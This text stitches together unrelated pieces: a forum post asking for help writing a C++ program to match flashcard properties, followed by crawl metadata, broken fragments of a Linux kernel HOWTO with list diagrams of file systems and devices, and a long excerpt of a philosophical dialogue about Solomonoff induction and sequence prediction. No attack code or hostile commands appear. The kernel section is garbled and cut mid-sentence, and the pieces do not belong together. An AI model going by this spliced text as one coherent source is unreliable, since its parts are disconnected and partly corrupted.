It looks like you're new here. If you want to get involved, click one of these buttons! Hey everyone what’s up? I’m trying to write a C++ program that’s way out of my league. So, no responses about how “I need to learn more” or “what you’re trying to do is beyond your skill” or any of that stuff. I already know this. I am here to get an answer. I also know that there are plenty of apps that help with what I’m trying to achieve but none of them do specifically what I want. Picture this. I’m sitting at a brown table with 3 flashcard sized areas (slots) tinted green horizontally represented. Ex. //////////////////// //////////////////// //////////////////// | slot 1 | | slot 2 | | slot 3 | | | | | | | //////////////////// //////////////////// /////////////////// I have 109 cards. Each card has 4 properties. Ex. Card #1 Weakness to Frost Fortify Sneak Weakness to Poison Fortify Restoration {step1}(Function???)Place Card#1 in slot 1 (always choose the lowest numbered card available). {step2}Then place Card#2 (next lowest numbered card available) in slot 2. Now look for similarities (Boolean???) between Card#1 and Card#2. “If” there are none, “then” replace Card#2 with Card#3 and check again. Keep this up until slot1 and slot2 match. Ex. Card#1 Card#4 Weakness to Frost Restore Health Fortify Sneak Fortify Light Armor Weakness to Poison Resist Shock Fortify Restoration Weakness to Frost These would not be a match Damage Magicka Damage Magicka Regen {step3} Repeat {step2} for slot3 starting from lowest numbered card available (card#2 since it is not in any slot) until slot3 matches any of the other slots. Ex. Card#1 Card#4 Card#5 Weakness to Frost Restore Health Resist Fire Fortify Sneak Fortify Light Armor Weakness to Shock Weakness to Poison Resist Shock Fortify Lockpicking Fortify Restoration Weakness to Frost Fortify Sneak {step4}This must be written (temporary database????) down to show that Card#1+Card#4+Card#5 = 4 (representing the # of properties that are similar between all 3 cards). That’s all for now. I would end up taking up too much space if I wrote the whole thing. I have Visual Studios 2010 with only some basic knowledge of C++. So, if this needs to be written in another language, please let me know. Here’s what I feel needs to be done. Wouldn’t I need to build something (database, data range etc.) to hold all 109 cards info? Or should I “define” each card as having 4 “variables”? Ex. using namespace std; int Card_One (Weakness_To_Frost, Fortify_Sneak, Weakness_To_Poison, Fortify_Restoration); int Card_Two (Damage_Stamina, Fortify_Conjuration, Damage_Magicka_Regen, Fortify_Enchanting); int Card_Three (Damage_Stamina, Invisibility, Resist_Fire, Fortify_Destruction); int Card_Four (Restore_Health, Fortify_Light_Armor, Resist_Shock, Weakness_To_Frost); int Card_Five (Resist_Fire, Weakness_To_Shock, Fortify_Lockpicking, Fortify_Sneak); int _main() { return 0; }
http://programmersheaven.com/discussion/437506/how-should-i-start
CC-MAIN-2017-13
refinedweb
460
65.42
Linux is written in ''C'' language, and as every application has:: _______ _______ _______ Global variable -------> |Item(1)| -> |Item(2)| -> |Item(3)| .. |_______| |_______| |_______| ________________ Current ----------------> | Actual process | |________________| Current points to ''task_struct'' structure, which contains all data about a process like:. ______ _______ ______ file_systems ------> | ext2 | -> | msdos | -> | ntfs | [fs/super.c] |______| |_______| |______| When you use command like ''modprobe some_fs'' you will add a new entry to file systems list, while removing it (by using ''rmmod'') will delete it. ______ _______ ______ mount_hash_table ---->| / | -> | /usr | -> | /var | [fs/namespace.c] |______| |_______| |______| When you use ''mount'' command to add a fs, the new entry will be inserted in the list, while an ''umount'' command will delete the entry. ______ _______ ______ ptype_all ------>| ip | -> | x25 | -> | ipv6 | [net/core/dev.c] |______| |_______| |______| For example, if you add support for IPv6 (loading relative module) a new entry will be added in the list. ______ _______ _______] |______| |_______| |_______| ______ _______ _______ dev_base --------------->| lo | -> | eth0 | -> | ppp0 | [drivers/core/Space.c] |______| |_______| |_______| ______ _______ ________ chrdevs ---------------->| lp | -> | keyb | -> | serial | [fs/devices.c] |______| |_______| |________| ''chrdevs'' is not a pointer to a real list, but it is a standard vector. ______ ______ ________ bdev_hashtable --------->| fd | -> | hd | -> | scsi | [fs/block_dev.c] |______| |______| |________| ''bdev_hashtable'' is an hash vector.
http://www.tldp.org/HOWTO/KernelAnalysis-HOWTO-14.html
CC-MAIN-2016-07
refinedweb
220
81.02
I need to make a big-theta notation on an algoritm I made. The algoritm is soposed to find factors of a number. This is the algoritm implemented in java: public class factor { public static void main (String argv[]) { int number =(Integer.parseInt(argv[0])); int counter = 0; for(counter = 1; counter <= number/2; counter++) { if(number % counter == 0)System.out.println(counter); } System.out.println(number); } } I figured the theta notation to this is: O(N) The problem is now that i need to express big theta as a function of of the length of N (the number of bits in N). I have no idea what I am supposed to do here? I would greatly appreciate if anyone could help.
http://www.dreamincode.net/forums/topic/66103-big-theta-notation/
CC-MAIN-2017-39
refinedweb
122
64.41
Aaron Mulder wrote: > Dude, need you use the f-bomb? Is this -- "Non-technical > tip: think about the f***ing users" -- honestly your idea of a > professional interaction with your peers? > Dude, do you think ignoring the needs of users is professional software development? That breaking everyone's application because you couldn't be bothered to think of an upgradable solution is professional behaviour? Before throwing the p-word around look in the mirror. > By the way, I think you were exaggerating when you said "tell them > this is a *good* thing because we're going to keep changing things until > 1.0 finally comes out". Do you feel that's an accurate representation of > the other side of this conversation? > "+100000000 before we release 1.0 is the exactly when we should be encouraging this type of drastic change." I read that as saying there will continue to be drastic changes until the 1.0 release - is that interpretation inaccurate? If you were a user, in light of that statement would you look at this software now or would you wait until after 1.0? > As far as stability goes, I hate to say it, but we're not there > yet. I'm going to have to make massive change to my book for the next > milestone. The entire security system looks nothing like it did in M3, > web services were not present in M3, MDBs did not work in M3, CMP was > incomplete in M3, there was no Tomcat option at all in M3, and the list > goes on. Add all that up, and removing 6 characters from a namespace is a > trivial change. I don't think anyone *should* be contemplating Geronimo > for anything "serious". We haven't even released a beta yet! > You might want to re-read what you said here. M3 was incomplete, which is different from incompatible. You make a good point with respect to security though - immediately after M3 was cut, all the security definitions incompatibly changed showing that, indeed, this project really does place little value on compatibility. It's not that the change itself isn't trivial, but that it is unnecessary and impacts EVERYONE. I would have hoped someone with your extensive "professional" experience would have understood that. > And on the topic of coordination for builds, it's true we could do > better. But you know what? Flaming me (or David, not sure who you were > targeting, really) doesn't help. If you'd like to propose a build, such > as M4, and ask for a feature freeze while we prepare and test it, I think > that would be a great idea. It would have been nice to have done that > before we announced that we pass the test, but let's go from where we are. >? > As far as design work goes, we've historically not had the > position of review-then-commit. I think we're trying to increase the > amount of discussion and planning on the list, but I'm not prepared to go > to a review-then-commit strategy. Are you? Short of that, yes, let's > talk on the list as we have been, but we also need to be prepared to make > adjustments to code that's committed as issues are identified. > Now who's exaggerating? You asked for "constructive" tips, one of those is "when you're about to break everyone's application, bring it up on the list first as other people may be able to help you find a way to avoid doing so." That avoids firedrills after and keeps users happier. -- Jeremy
http://mail-archives.apache.org/mod_mbox/geronimo-dev/200507.mbox/%3C42C976B2.7090107@apache.org%3E
CC-MAIN-2015-06
refinedweb
603
71.95
Given an array of non-negative integers of length N and an integer k. Partition the given array into two subarrays of length K and N – k so that the difference between the sum of both subarray is maximum. Examples : Input : arr[] = {8, 4, 5, 2, 10} k = 2 Output : 17 Explanation : Here, we can make first subarray of length k = {4, 2} and second subarray of length N - k = {8, 5, 10}. Then, the max_difference = (8 + 5 + 10) - (4 + 2) = 17. Input : arr[] = {1, 1, 1, 1, 1, 1, 1, 1} k = 3 Output : 2 Explanation : Here, subarrays would be {1, 1, 1, 1, 1} and {1, 1, 1}. So, max_difference would be 2. Choose k numbers with largest possible sum. Then the solution obviously is k largest numbers. So that here greedy algorithm works – at each step we choose the largest possible number until we get all K numbers. In this problem we should divide the array of N numbers into two subarrays of k and N – k numbers respectively. Consider two cases – - The subarray with largest sum, among these two subarrays, is subarray of K numbers. Then we want to maximize the sum in it, since the sum in the second subarray will only decrease if the sum in the first subarray will increase. So we are now in sub-problem considered above and should choose k largest numbers. - The subarray with largest sum, among these two subarray, is subarray of N – k numbers. Similarly to the previous case we then have to choose N – k largest numbers among all numbers. Now, Let’s think which of the two above cases actually gives the answer. We can easily see that larger difference would be when more numbers are included to the group of largest numbers. Hence we could set M = max(k, N – k), find the sum of M largest numbers (let it be S1) and then the answer is S1 – (S – S1), where S is the sum of all numbers. Below is the implementation of the above approach : C++ // CPP program to calculate max_difference between // the sum of two subarrays of length k and N - k #include <bits/stdc++.h> using namespace std; // Function to calculate max_difference int maxDifference(int arr[], int N, int k) { int M, S = 0, S1 = 0, max_difference = 0; // Sum of the array for (int i = 0; i < N; i++) S += arr[i]; // Sort the array in descending order sort(arr, arr + N, greater<int>()); M = max(k, N - k); for (int i = 0; i < M; i++) S1 += arr[i]; // Calculating max_difference max_difference = S1 - (S - S1); return max_difference; } // Driver function int main() { int arr[] = { 8, 4, 5, 2, 10 }; int N = sizeof(arr) / sizeof(arr[0]); int k = 2; cout << maxDifference(arr, N, k) << endl; return 0; } Python3 # Python3 code to calculate max_difference # between the sum of two subarrays of # length k and N - k # Function to calculate max_difference def maxDifference(arr, N, k ): S = 0 S1 = 0 max_difference = 0 # Sum of the array for i in range(N): S += arr[i] # Sort the array in descending order arr.sort(reverse=True) M = max(k, N - k) for i in range( M): S1 += arr[i] # Calculating max_difference max_difference = S1 - (S - S1) return max_difference # Driver Code arr = [ 8, 4, 5, 2, 10 ] N = len(arr) k = 2 print(maxDifference(arr, N, k)) # This code is contributed by "Sharad_Bhardwaj". PHP <?php // PHP program to calculate // max_difference between // the sum of two subarrays // of length k and N - k // Function to calculate // max_difference function maxDifference($arr, $N, $k) { $M; $S = 0; $S1 = 0; $max_difference = 0; // Sum of the array for ($i = 0; $i < $N; $i++) $S += $arr[$i]; // Sort the array in // descending order rsort($arr); $M = max($k, $N - $k); for ($i = 0; $i < $M; $i++) $S1 += $arr[$i]; // Calculating // max_difference $max_difference = $S1 - ($S - $S1); return $max_difference; } // Driver Code $arr = array(8, 4, 5, 2, 10); $N = count($arr); $k = 2; echo maxDifference($arr, $N, $k); // This code is contributed // by anuj_67. ?> Output : 17 Further Optimizations : We can use Heap (or priority queue) to find M largest elements efficiently. Refer k largest(or smallest) elements in an array for generate random alphabets - k largest(or smallest) elements in an array | added Min Heap method - Maximum sum of pairwise product in an array with negative allowed - Rearrange array such that even positioned are greater than odd - Circular array -.
https://www.geeksforgeeks.org/partition-into-two-subarrays-of-lengths-k-and-n-k-such-that-the-difference-of-sums-is-maximum/
CC-MAIN-2018-34
refinedweb
733
50.5
public struct Bar { public int i; } [WebMethod] public int Foo( Bar bar ) { System.Threading.Thread.Sleep(2000); return bar.i; } Next, let’s take some client code to make everything clear: // this class hold the details needed to get results back // which include the web service instance and the IAsyncResult public class AsyncDetails { public SimpleProcess Function; public IAsyncResult AsyncResult; public AsyncDetails( SimpleProcess function, IAsyncResult result ) { Function = function; AsyncResult = result; } } public void TestRun() { ArrayList results = new ArrayList(); SimpleProcess process = new SimpleProcess(); // note - the behavior only becomes obvious when passing // a struct or class - value parameters only help mask the // real underlying behavior. Bar bar = new Bar(); // Launch 20 running instances and aggregate them in an // ArrayList for further processing for( int x = 0; x < 20; x++ ) { // this works the same whether I use a shared webservice instance or // create a new instance for each call bar.i = x; results.Add( new AsyncDetails( process, process.BeginFoo(bar, null, null))); } // next, go through each result and complete processing. // real-world app would be aggregating results at this point foreach( AsyncDetails detail in results ) { // assuming that processing is order dependent... if( !detail.AsyncResult.IsCompleted ) detail.AsyncResult.AsyncWaitHandle.WaitOne(); Console.WriteLine( detail.Function.EndFoo( detail.AsyncResult )); } } {0,1,2,3,4,5,6,…,19} in roughly 2 seconds? Wrong. The answer is: {19, 19, 19, 19, 19,…, 19} in roughly 10 seconds! Why is this? It turns out my operating assumption is incorrect. My belief that BeginFoo(…) actually launched a request is completely invalid - it only queues the request. If they were run as I expected, my Bar struct would be serialized during my call to BeginFoo(…). Because it’s being queued, the actual physical call being made to Foo is using the shared Bar struct which has a value of 19 when it’s actually made! Furthermore, when you watch this run in NUnit you’ll see that it’s actually making two requests at a time (two results appear simultaneously, two second wait, two more results appear simultaneously, two second wait…, and so on). My answer to this problem four years ago was to place synchronous requests in a worker threadpool and manage the threads – it turns out that was the right call. After looking at the behavior of .Net, it appears that they are also running these calls on background threads. When doing this, you have to be conscientious in the number of threads being used to service these requests (especially if you’re making these from within a web application or webservice). I would have hoped the .Net implementation would have been more elegant than my thrown-together threadpool, but it turns out that’s just not the case. Perhaps they could have used Overlapped I/O with sockets available since winsock 2??? I suppose if you are making these calls over the public internet you risk being mistaken as an attemped DOS source [Update 7/20/2006 - It turns out the two connection limit is a machine.config level setting. Check out my followup to this post for more details. While this is configurable, all calls are still being made within .Net's threadpool - so if you are making web service calls from a server-side web application/service, you are dealing with a limited resource.] [Note:] The MSDN documentation errantly states: The client instructs the Begin method to start processing the service call, but return immediately. It's the "start processing the service call" line that should be reworded to "queue the service call". [Advertisement] After getting a few questions about the solution to invalid return values that I mentioned in the original PingBack
http://codebetter.com/blogs/steve.hebert/archive/2006/07/14/147371.aspx
crawl-002
refinedweb
605
53
An Introduction to React Components | Any user interface can be broken into smaller parts. These parts are components of the UI. An example is the page you are viewing right now (the dev.to page). Let's try to break it into smaller parts. First, we have two major parts: the navbar on top of the page and the body that contains the text you are reading. The navbar can further be broken down into smaller parts. We have a search field, a link for write a post, a notification icon and a dropdown menu with an image on top. Each of these parts is a component that make up the navbar of this page. They can be referred to as sub-components of the navbar. So the page is made up of components(the navbar and body) that have sub-components. The more complex the UI is, the more components it can be broken into. Let's get a proper definition now. A component is a reusable chunk of code. Components make it possible to divide any UI into independent, reusable pieces and think about these pieces in isolation. Just like a pure function, a component should ideally do just one thing. What are we waiting for? Let's create a component right away. We are going to create a component that welcomes people to a page. It is really basic but it is important that we start with this so that we can easily understand how to create and render a component. Here's a Codepen of what we want to achieve. import React from "react"; import ReactDOM from "react-dom"; class Greeting extends React.Component { render() { return ( <div className = "box"> <h2> Hello Human Friend!!!</h2> <p> We are so glad to have you here. </p> </div> ); } } ReactDOM.render(<Greeting />, document.getElementById("app")); It's okay if you don't understand what's going on in the code. I'll explain each part shortly. Let's start with the first part. import React from "react"; import ReactDOM from "react-dom"; react and react-dom are JavaScript libraries. react is the React library. It contains methods that you need in order to use React. react-dom is a JavaScript library which contains several methods that deal with the DOM in some way. What we are doing here is simply assigning these libraries to variables so that they can their methods can be used anywhere in our js file. class Greeting extends React.Component { ... The above is the syntax for creating a component class. Here we are making use of the ES6 class to make a component class. This component class itself is not a component but a factory that is used to create components. Confusing huh? It is similar to a CSS class. You define a class in a CSS file once. Then you can use this class in several places through out your HTML file. Each time you use the class, all properties of the class are added to the HTML element you use it for. So here, you define a component class and use it to create components with the same methods that were defined in the component class. Greeting is the name of your component class. In React, components conventionally start with a capital letter to differentiate them from normal HTML elements. The extends keyword is used in class declarations or class expressions to create a class as a child of another class. That is, to create a subclass of a class. To create this component class, you use a base class from the React library which is React.Component. When you do this, you are actually subclassing React.Component. So the above is the syntax for creating a component class. Note: This is not the only way to create a component. I just find this one more convenient. render() { return ( <div className = "box"> <h2> Hello Human friend</h2> <p> We are so glad to have you here. </p> </div> ); } } render() is an important part of each component class. It should be present in every component class. It must also contain a return statement. Basically, render() is a function that defines what should be returned in a component. This could be a react element, a string or number or even a component. The render() function should be pure. This means that it does not modify component state, it returns the same result each time it’s invoked, and it does not directly interact with the browser. So in our component, the render() function will return an element which is the <div>. Finally, ReactDOM.render(<Greeting />, document.getElementById("app")); ReactDOM.render causes your component to appear on the screen. Remember a self closing tag must always contain the forward slash before the closing angle bracket in JSX. Once more, here's a link to the Codepen where you can see the component that was just created. You can always play with it to ensure that you understand it. Now, if I ever want to welcome people on any other part of my app, I'll simply use the <Greeting /> component. Cool!!! There you have it, an introduction to React components. Got any question? Any addition? Feel free to leave a comment. Thank you for reading :)
https://sarahchima.com/blog/intro-to-react-components/
CC-MAIN-2019-13
refinedweb
878
67.35
14 March 2012 16:15 [Source: ICIS news] Correction: In the ICIS story headlined "Corrected: Brazil’s Braskem reports $112m loss in fourth quarter" dated 14 March 2012, please read the headline as "…$112m loss…" instead of "…$111m loss…".MEDELLIN, Colombia (ICIS)--Brazil's Braskem, Latin America's largest petrochemical company, reported a quarterly loss of reais (R) 201m ($112m, €85m) for the fourth quarter amid higher raw-material costs, slowing demand and narrowing spreads in global markets, the company said during a conference call on Wednesday. Earnings before interest, tax, depreciation and amortisation (EBITDA), a gauge of operating profit, was $396m during the quarter, down 33% year on year. In 2011, EBITDA reached $2.2bn, down 3% year on year. Net revenue increased 25% to R8.7bn in the quarter, up from R7.0bn year on year, Braskem said. Domestic sales volumes dropped 12% for thermoplastic polymers and 6% for polyvinyl chloride (PVC), owing to competition from increasing imports, Braskem said. Costs jumped 39% in the quarter to over R8bn. The lack of strategy to contain ?xml:namespace> The average capacity utilisation rate of the company’s crackers was 80% amid two maintenance shutdowns - one scheduled for October at the Triunfo site in the state of Rio Grande do Sul, and the other at the Camacari site in the state of Bahia. The Camacari maintenance was originally planned for early 2012, but was moved up to November in view of market conditions, according to the company. Braskem’s new PVC and vinyl chloride monomer (VCM) plants in the state of Alagoas are expected to start in May 2012. The plant will have a capacity of 200,000 tonnes/year, increasing the total PVC capacity at Alagoas to 460,000 tonnes/year. Currently, Braskem’s total PVC capacity exceeds 500,000 tonnes/year, produced mainly at its plants in Alagoas and The company pushed back the start-up of a new butadiene (BD) plant one month, to July, at the Triunfo petrochemical complex in the southern state of The first phase of engineering for the Comperj project, the new petrochemical complex to be built in the state of Project financing for Braskem’s joint venture with Mexico-based Idesa for the Ethylene XXI project in Braskem and Idesa expect to start up the 1.05m tonnes/year cracker project in mid-2015, Idesa CEO Jose Luis Uriegas said in November. The project, which comprises an integrated ethane cracker and polyethylene (PE) units, was originally scheduled to start up in early 2015. Downstream production will comprise two high density polyethylene (HDPE) plants with capacities of 350,000 and 400,000 tonnes/year and one 300,000 tonne/year low density polyethylene (LDPE) plant, Uriegas said. ($1 = €0.76) ($1 = R
http://www.icis.com/Articles/2012/03/14/9541680/corrected-brazils-braskem-reports-112m-loss-in-fourth-quarter.html
CC-MAIN-2015-06
refinedweb
459
58.21
(Originally posted in December 2015: A dialogue between Ashley, a computer scientist who's never heard of Solomonoff's theory of inductive inference, and Blaine, who thinks it is the best thing since sliced bread.) i. Unbounded analysis ASHLEY: Good evening, Msr. Blaine. BLAINE: Good evening, Msr. Ashley. ASHLEY: I've heard there's this thing called "Solomonoff's theory of inductive inference". BLAINE: The rumors have spread, then. ASHLEY: Yeah, so, what the heck is that about? BLAINE: Invented in the 1960s by the mathematician Ray Solomonoff, the key idea in Solomonoff induction is to do sequence prediction by using Bayesian updating on a prior composed of a mixture of all computable probability distributions— ASHLEY: Wait. Back up a lot. Before you try to explain what Solomonoff induction is, I'd like you to try to tell me what it does, or why people study it in the first place. I find that helps me organize my listening. Right now I don't even know why I should be interested in this. BLAINE: Um, okay. Let me think for a second... ASHLEY: Also, while I can imagine things that "sequence prediction" might mean, I haven't yet encountered it in a technical context, so you'd better go a bit further back and start more at the beginning. I do know what "computable" means and what a "probability distribution" is, and I remember the formula for Bayes's Rule although it's been a while. BLAINE: Okay. So... one way of framing the usual reason why people study this general field in the first place, is that sometimes, by studying certain idealized mathematical questions, we can gain valuable intuitions about epistemology. That's, uh, the field that studies how to reason about factual questions, how to build a map of reality that reflects the territory— ASHLEY: I have some idea what 'epistemology' is, yes. But I think you might need to start even further back, maybe with some sort of concrete example or something. BLAINE: Okay. Um. So one anecdote that I sometimes use to frame the value of computer science to the study of epistemology is Edgar Allen Poe's argument in 1833 that chess was uncomputable. ASHLEY: That doesn't sound like a thing that actually happened. BLAINE: I know, but it totally did happen and not in a metaphorical sense either! Edgar Allen Poe wrote an essay explaining why no automaton would ever be able to play chess, and he specifically mentioned "Mr. Babbage's computing engine" as an example. You see, in the nineteenth century, there was for a time this sensation known as the Mechanical Turk—supposedly a machine, an automaton, that could play chess. At the grandmaster level, no less. Now today, when we're accustomed to the idea that it takes a reasonably powerful computer to do that, we can know immediately that the Mechanical Turk must have been a fraud and that there must have been a concealed operator inside—a person with dwarfism, as it turned out. Today we know that this sort of thing is hard to build into a machine. But in the 19th century, even that much wasn't known. So when Edgar Allen Poe, who besides being an author was also an accomplished magician, set out to write an essay about the Mechanical Turk, he spent the second half of the essay dissecting what was known about the Turk's appearance to (correctly) figure out where the human operator was hiding. But Poe spent the first half of the essay arguing that no automaton—nothing like Mr. Babbage's computing engine—could possibly play chess, which was how he knew a priori that the Turk had a concealed human operator. ASHLEY: And what was Poe's argument? BLAINE: Poe observed that in an algebraical problem, each step followed from the previous step of necessity, which was why the steps in solving an algebraical problem could be represented by the deterministic motions of gears in something like Mr. Babbage's computing engine. But in a chess problem, Poe said, there are many possible chess moves, and no move follows with necessity from the position of the board; and even if you did select one move, the opponent's move would not follow with necessity, so you couldn't represent it with the determined motion of automatic gears. Therefore, Poe said, whatever was operating the Mechanical Turk must have the nature of Cartesian mind, rather than the nature of deterministic matter, and this was knowable a priori. And then he started figuring out where the required operator was hiding. ASHLEY: That's some amazingly impressive reasoning for being completely wrong. BLAINE: I know! Isn't it great? ASHLEY: I mean, that sounds like Poe correctly identified the hard part of playing computer chess, the branching factor of moves and countermoves, which is the reason why no simple machine could do it. And he just didn't realize that a deterministic machine could deterministically check many possible moves in order to figure out the game tree. So close, and yet so far. BLAINE: More than a century later, in 1950, Claude Shannon published the first paper ever written on computer chess. And in passing, Shannon gave the formula for playing perfect chess if you had unlimited computing power, the algorithm you'd use to extrapolate the entire game tree. We could say that Shannon gave a short program that would solve chess if you ran it on a hypercomputer, where a hypercomputer is an ideal computer that can run any finite computation immediately. And then Shannon passed on to talking about the problem of locally guessing how good a board position was, so that you could play chess using only a small search. I say all this to make a point about the value of knowing how to solve problems using hypercomputers, even though hypercomputers don't exist. Yes, there's often a huge gap between the unbounded solution and the practical solution. It wasn't until 1997, forty-seven years after Shannon's paper giving the unbounded solution, that Deep Blue actually won the world chess championship— ASHLEY: And that wasn't just a question of faster computing hardware running Shannon's ideal search algorithm. There were a lot of new insights along the way, most notably the alpha-beta pruning algorithm and a lot of improvements in positional evaluation. BLAINE: Right! But I think some people overreact to that forty-seven year gap, and act like it's worthless to have an unbounded understanding of a computer program, just because you might still be forty-seven years away from a practical solution. But if you don't even have a solution that would run on a hypercomputer, you're Poe in 1833, not Shannon in 1950. The reason I tell the anecdote about Poe is to illustrate that Poe was confused about computer chess in a way that Shannon was not. When we don't know how to solve a problem even given infinite computing power, the very work we are trying to do is in some sense murky to us.. BLAINE: Yes, but the point is that you can't even get started on that if you're arguing about how playing chess has the nature of Cartesian mind rather than matter. At that point you're not 50 years away from winning the chess championship, you're 150 years away, because it took an extra 100 years to move humanity's understanding to the point where Claude Shannon could trivially see how to play perfect chess using a large-enough computer. I'm not trying to exalt the unbounded solution by denigrating the work required to get a bounded solution. I'm not saying that when we have an unbounded solution we're practically there and the rest is a matter of mere lowly efficiency. I'm trying to compare having the unbounded solution to the horrific confusion of not understanding what we're trying to do. ASHLEY: Okay. I think I understand why, on your view, it's important to know how to solve problems using infinitely fast computers, or hypercomputers as you call them. When we can say how to answer a question using infinite computing power, that means we crisply understand the question itself, in some sense; while if we can't figure out how to solve a problem using unbounded computing power, that means we're confused about the problem, in some sense. I mean, anyone who's ever tried to teach the more doomed sort of undergraduate to write code knows what it means to be confused about what it takes to compute something. BLAINE: Right. ASHLEY: So what does this have to do with "Solomonoff induction"? BLAINE: Ah! Well, suppose I asked you how to do epistemology using infinite computing power? ASHLEY: My good fellow, I would at once reply, "Beep. Whirr. Problem 'do epistemology' not crisply specified." At this stage of affairs, I do not think this reply indicates any fundamental confusion on my part; rather I think it is you who must be clearer. BLAINE: Given unbounded computing power, how would you reason in order to construct an accurate map of reality? ASHLEY: That still strikes me as rather underspecified. BLAINE: Perhaps. But even there I would suggest that it's a mark of intellectual progress to be able to take vague and underspecified ideas like 'do good epistemology' and turn them into crisply specified problems. Imagine that I went up to my friend Cecil, and said, "How would you do good epistemology given unlimited computing power and a short Python program?" and Cecil at once came back with an answer—a good and reasonable answer, once it was explained. Cecil would probably know something quite interesting that you do not presently know. ASHLEY: I confess to being rather skeptical of this hypothetical. But if that actually happened—if I agreed, to my own satisfaction, that someone had stated a short Python program that would 'do good epistemology' if run on an unboundedly fast computer—then I agree that I'd probably have learned something quite interesting about epistemology. BLAINE: What Cecil knows about, in this hypothetical, is Solomonoff induction. In the same way that Claude Shannon answered "Given infinite computing power, how would you play perfect chess?", Ray Solomonoff answered "Given infinite computing power, how would you perfectly find the best hypothesis that fits the facts?" ASHLEY: Suddenly, I find myself strongly suspicious of whatever you are about to say to me. BLAINE: That's understandable. ASHLEY: In particular, I'll ask at once whether "Solomonoff induction" assumes that our hypotheses are being given to us on a silver platter along with the exact data we're supposed to explain, or whether the algorithm is organizing its own data from a big messy situation and inventing good hypotheses from scratch. BLAINE: Great question! It's the second one. ASHLEY: Really? Okay, now I have to ask whether Solomonoff induction is a recognized concept in good standing in the field of academic computer science, because that does not sound like something modern-day computer science knows how to do. BLAINE: I wouldn't say it's a widely known concept, but it's one that's in good academic standing. The method isn't used in modern machine learning because it requires an infinitely fast computer and isn't easily approximated the way that chess is. ASHLEY: This really sounds very suspicious. Last time I checked, we hadn't begun to formalize the creation of good new hypotheses from scratch. I've heard about claims to have 'automated' the work that, say, Newton did in inventing classical mechanics, and I've found them all to be incredibly dubious. Which is to say, they were rigged demos and lies. BLAINE: I know, but— ASHLEY: And then I'm even more suspicious of a claim that someone's algorithm would solve this problem if only they had infinite computing power. Having some researcher claim that their Good-Old-Fashioned AI semantic network would be intelligent if run on a computer so large that, conveniently, nobody can ever test their theory, is not going to persuade me. BLAINE: Do I really strike you as that much of a charlatan? What have I ever done to you, that you would expect me to try pulling a scam like that? ASHLEY: That's fair. I shouldn't accuse you of planning that scam when I haven't seen you say it. But I'm pretty sure the problem of "coming up with good new hypotheses in a world full of messy data" is AI-complete. And even Mentif- BLAINE: Do not say the name, or he will appear! ASHLEY: Sorry. Even the legendary first and greatest of all AI crackpots, He-Who-Googles-His-Name, could assert that his algorithms would be all-powerful on a computer large enough to make his claim unfalsifiable. So what? BLAINE: That's a very sensible reply and this, again, is exactly the kind of mental state that reflects a problem that is confusing rather than just hard to implement. It's the sort of confusion Poe might feel in 1833, or close to it. In other words, it's just the sort of conceptual issue we would have solved at the point where we could state a short program that could run on a hypercomputer. Which Ray Solomonoff did in 1964. ASHLEY: Okay, let's hear about this supposed general solution to epistemology. ii. Sequences BLAINE: First, try to solve the following puzzle. 1, 3, 4, 7, 11, 18, 29...? ASHLEY: Let me look at those for a moment... 47. BLAINE: Congratulations on engaging in, as we snooty types would call it, 'sequence prediction'. ASHLEY: I'm following you so far. BLAINE: The smarter you are, the more easily you can find the hidden patterns in sequences and predict them successfully. You had to notice the resemblance to the Fibonacci rule to guess the next number. Someone who didn't already know about Fibonacci, or who was worse at mathematical thinking, would have taken longer to understand the sequence or maybe never learned to predict it at all. ASHLEY: Still with you. BLAINE: It's not a sequence of numbers per se... but can you see how the question, "The sun has risen on the last million days. What is the probability that it rises tomorrow?" could be viewed as a kind of sequence prediction problem? ASHLEY: Only if some programmer neatly parses up the world into a series of "Did the Sun rise on day X starting in 4.5 billion BCE, 0 means no and 1 means yes? 1, 1, 1, 1, 1..." and so on. Which is exactly the sort of shenanigan that I see as cheating. In the real world, you go outside and see a brilliant ball of gold touching the horizon, not a giant "1". BLAINE: Suppose I have a robot running around with a webcam showing it a pixel field that refreshes 60 times a second with 32-bit colors. I could view that as a giant sequence and ask the robot to predict what it will see happen when it rolls out to watch a sunrise the next day. ASHLEY: I can't help but notice that the 'sequence' of webcam frames is absolutely enormous, like, the sequence is made up of 66-megabit 'numbers' appearing 3600 times per minute... oh, right, computers much bigger than the universe. And now you're smiling evilly, so I guess that's the point. I also notice that the sequence is no longer deterministically predictable, that it is no longer a purely mathematical object, and that the sequence of webcam frames observed will depend on the robot's choices. This makes me feel a bit shaky about the analogy to predicting the mathematical sequence 1, 1, 2, 3, 5. BLAINE: I'll try to address those points in order. First, Solomonoff induction is about assigning probabilities to the next item in the sequence. I mean, if I showed you a box that said 1, 1, 2, 3, 5, 8 you would not be absolutely certain that the next item would be 13. There could be some more complicated rule that just looked Fibonacci-ish but then diverged. You might guess with 90% probability but not 100% probability, or something like that. ASHLEY: This has stopped feeling to me like math. BLAINE: There is a large branch of math, to say nothing of computer science, that deals in probabilities and statistical prediction. We are going to be describing absolutely lawful and deterministic ways of assigning probabilities after seeing 1, 3, 4, 7, 11, 18. ASHLEY: Okay, but if you're later going to tell me that this lawful probabilistic prediction rule underlies a generally intelligent reasoner, I'm already skeptical. No matter how large a computer it's run on, I find it hard to imagine that some simple set of rules for assigning probabilities is going to encompass truly and generally intelligent answers about sequence prediction, like Terence Tao would give after looking at the sequence for a while. We just have no idea how Terence Tao works, so we can't duplicate his abilities in a formal rule, no matter how much computing power that rule gets... you're smiling evilly again. I'll be quite interested if that evil smile turns out to be justified. BLAINE: Indeed. ASHLEY: I also find it hard to imagine that this deterministic mathematical rule for assigning probabilities would notice if a box was outputting an encoded version of "To be or not to be" from Shakespeare by mapping A to Z onto 1 to 26, which I would notice eventually though not immediately upon seeing 20, 15, 2, 5, 15, 18... And you're still smiling evilly. BLAINE: Indeed. That is exactly what Solomonoff induction does. Furthermore, we have theorems establishing that Solomonoff induction can do it way better than you or Terence Tao. ASHLEY: A theorem proves this. As in a necessary mathematical truth. Even though we have no idea how Terence Tao works empirically... and there's evil smile number four. Okay. I am very skeptical, but willing to be convinced. BLAINE: So if you actually did have a hypercomputer, you could cheat, right? And Solomonoff induction is the most ridiculously cheating cheat in the history of cheating. ASHLEY: Go on. BLAINE: We just run all possible computer programs to see which are the simplest computer programs that best predict the data seen so far, and use those programs to predict what comes next. This mixture contains, among other things, an exact copy of Terence Tao, thereby allowing us to prove theorems about their relative performance. ASHLEY: Is this an actual reputable math thing? I mean really? BLAINE: I'll deliver the formalization later, but you did ask me to first state the point of it all. The point of Solomonoff induction is that it gives us a gold-standard ideal for sequence prediction, and this gold-standard 